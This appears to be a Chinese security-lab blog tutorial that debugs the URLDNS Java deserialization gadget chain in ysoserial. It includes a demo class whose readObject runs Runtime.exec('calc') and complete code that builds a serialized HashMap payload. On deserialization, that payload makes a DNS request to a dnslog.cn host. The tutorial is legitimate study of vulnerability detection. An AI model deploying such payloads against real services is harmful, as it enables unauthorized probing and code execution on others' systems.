Java反序列化:URLDNS的反序列化调试分析

蚁景网安实验室
496 阅读4分钟

URLDNS链子是Java反序列化分析的第0课,网上也有很多优质的分析文章。

笔者作为Java安全初学者,也从0到1调试了一遍,现在给出调试笔记。

一. Java反序列化前置知识

Java原生链序列化:利用Java.io.ObjectInputStream对象输出流的writerObject方法实现Serializable接口,将对象转化成字节序列。

Java原生链反序列化:利用Java.io.ObjectOutputStream对象输入流的readObject方法实现将字节序列转化成对象。

测试源码如下,此部分源码参考了ol4three师傅的博客:

package serialize;​import java.io.*;​public class deserTest implements Serializable {    private int n;    public deserTest(int n) {        this.n=n;    }​    @Override    public String toString() {        return "deserTest2 [n=" + n + ", getClass()=" + getClass() + ", hashCode()=" + hashCode() + ", toString()="                + super.toString() + "]";    }​    // 反序列化    private void readObject(java.io.ObjectInputStream in) throws IOException,ClassNotFoundException{        in.defaultReadObject();                         Runtime.getRuntime().exec("calc");                  System.out.println("test");    }​    public static void main(String[] args) {        deserTest x = new deserTest(5);        operation1.ser(x);        operation1.deser();        x.toString();    }}​​// 实现序列化和反序列化具体细节的类class operation1{​    // 将输出字节流写入文件中进行封存    public static void ser(Object obj) {        // 序列化操作,写操作        try {             // 首先文件落地object.obj存储输出流,绑定输出流                       ObjectOutputStream ooStream = new ObjectOutputStream(new FileOutputStream("object.obj"));​            // 重定向将输出流字节写入文件            ooStream.writeObject(obj);                        ooStream.flush();            ooStream.close();​        } catch (FileNotFoundException e) {            e.printStackTrace();        }catch (IOException e) {            // TODO: handle exception            e.printStackTrace();        }    }            public static void deser() {        // 反序列化,读取操作        try {            // 绑定输入流            ObjectInputStream iiStream = new ObjectInputStream(new FileInputStream("object.obj"));                        // 反序列化时需要从相关的文件容器中读取输出的字节流            // 读取字节流操作为readObject,所以重写readObject可以执行自定义代码            Object xObject = iiStream.readObject();            iiStream.close();        } catch (IOException e) {            // TODO: handle exception            e.printStackTrace();        } catch (ClassNotFoundException e) {            // TODO Auto-generated catch block            e.printStackTrace();        }    }}

image-20230622200428296

二. ysoserial环境搭建

IDE就直接用JetBrains的IDEA就行

直接拿Java安全payload集成化工具ysoserial进行分析,这里面已经有现成的环境了

github.com/frohoff/yso…

注意配置好相应的JDKSDK版本:

image-20230704224019895

三. URLDNS攻击链

  • 影响的版本问题:与JDK版本无关,其攻击链实现依赖于Java内置类,与第三方库无关

  • URLDNS这条反序列化链只能发起DNS请求,无法进行其他利用,可以作为验证是否有反序列化漏洞的姿势

调试分析

Gadget Chain:

Deserializer.deserialize() -> HashMap.readObject() -> HashMap.putVal() -> HashMap.hash() ->URL.hashCode() ->

getHostAddress()

在getHostAddress函数中进行域名解析,从而可以被DNSLog平台捕获

URLDNS程序入口

ysoserial-master\src\main\java\ysoserial\payloads\URLDNS.java路径下有URLDNS.java文件

帮助网安学习,全套资料S信领取:

① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC漏洞分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

main主函数的run函数打断点进入

image-20230704233815765

这个ysoserial-masterpayload运行结构大致是有一个专门的PayloadRunner运行程序,然后统一调用来运行各部分的payload

首先是进行序列化:

image-20230706141716624

image-20230706142531102

继续往下,生成command,由于是分析URLDNS攻击链,所以只需要修改将返回值为dnslog的临时地址

image-20230706142701137

创建实例后,进入到URLDNSgetObjectpayload函数

image-20230706143357422

getObject函数中应该注意的是:声明了HashMap对象和URL对象,并进行put哈希绑定,最后设置作用域

image-20230706170830440

image-20230706204403039

反序列化链子:

在反序列化入口处打断点:

image-20230706195621770

在反序列化时调用了readObject函数

image-20230706201128369

然后进入HashMap.javareadObject函数

image-20230706201250160

readObject中调试到此行,了putval,在此处IDEA这个IDE可以选择进入的函数,直接进入后者hash

由于我们读入字节序列,需要将其恢复成相应的对象结构,那么就需要重新putval

image-20230706201454673

传入的key不为空,执行key.hashCode

image-20230706211639259

进一步在URL.java文件下

image-20230706203125428

进入URLStreamHandlerhashCode

image-20230706203401159

image-20230706202850373

产生解析:

image-20230706203000482

总的来说,利用链思路如下:

在反序列化URLDNS对象时,也需要反序列化HashMap对象,从而调用了HashMap.readObject()的重写函数,重写函数中调用了哈希表putval等的相关重构函数,在hashcode下调用了getHostAddress函数

那么反之,为什么首次声明的时候没有调用到了getHostAddress函数,现在给出声明时的函数路线:

ht.put() --> .. --> SilentURLStreamHandler.getHostAddress()

该函数为空实现

列出几个路线上的关键函数看看:

image-20230706214936664

image-20230706214859555

由于此处keyString类型,则进入String.hashCode

相比之下,在反序列化中keyURL类型

image-20230706215923777

设置了不发起dns解析

image-20230706221106262

image-20230706214558083

具体执行流,可以看下时序图,我就不讲了^^

image-20230706214734409

四. URLDNS链的使用

import java.io.*;import java.lang.reflect.Field;import java.net.InetAddress;import java.net.URL;import java.net.URLConnection;import java.net.URLStreamHandler;import java.util.HashMap;​public class Main{​​    // 序列化前不发生dns解析    static class SilentURLStreamHandler extends URLStreamHandler{        protected URLConnection openConnection(URL n) throws IOException{            return null;        }​        protected synchronized InetAddress getHostAddress(URL n)        {            return null;        }    }​    public static void main(String[] args) throws Exception{​        HashMap hashMap = new HashMap();​        // 设置put时不发起dns解析        URLStreamHandler handler = new Main.SilentURLStreamHandler();        URL url = new URL(null, "http://jloqk8.dnslog.cn", handler);​​        // 利用Java反射机制在动态执行时获取类        Class clazz = Class.forName("java.net.URL");        Field f = clazz.getDeclaredField("hashCode");        f.setAccessible(true);​        hashMap.put(url, "123");        f.set(url, -1);​        // 对象输出流绑定文件输出流        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("out.bin"));        oos.writeObject(hashMap);   // 序列化​        // 对象输入流绑定文件输入流        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("out.bin"));        ois.readObject();           // 反序列化​    }​}

image-20230706222309238

avatar
文章
阅读
粉丝